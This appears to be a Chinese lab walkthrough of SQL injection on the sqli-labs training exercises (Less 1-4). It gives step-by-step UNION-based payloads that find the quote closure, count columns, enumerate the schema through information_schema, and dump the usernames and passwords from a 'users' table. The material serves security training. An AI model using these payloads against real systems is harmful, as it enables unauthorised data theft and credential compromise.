本文详细介绍了SQL注入的步骤,包括寻找参数、判断数据类型、闭合方式验证、利用OrderBy和Union查询获取列数和数据库信息、暴库名、暴表名及内容。讲解了如何通过闭合方式、联合查询和信息聚合函数来实施攻击,并展示了如何从数据库中提取username和password。
注:sql注入less1-4仅仅闭合方式不一样,以第一种为例哈
sql高阶后续会更新哈,后续所有实验会配图解
步骤一:先找参数,一般id=[参数]
步骤二:在参数后加\来报错,找出类型,一般有:' " ') ") ')) ")) )) + 没有闭合
一般看1\ 后面的内容
步骤三:验证闭合,找出闭合后,后面加--+进行验证。
步骤四:通过order by 【参数】 通过二分法来找列的数目,然后找出limit 0,1,2.....参数
步骤五:通过union联合查询,在id的数字前加 - 报错使后面的句子成立,例如 :id=-2 union select 1,2,3 --+会出现报错位
步骤六:将报错位通过database()来查看库名(暴库名)
步骤七:暴表名 ,将security中的表名显示出来
步骤八:将表users里面的内容显示
id=-2 加闭合方式 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
发现:id username,password
步骤九:将username和password显示
id=-2加闭合方式 union select 1,group_concat(username),group_concat(password) from users --+
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
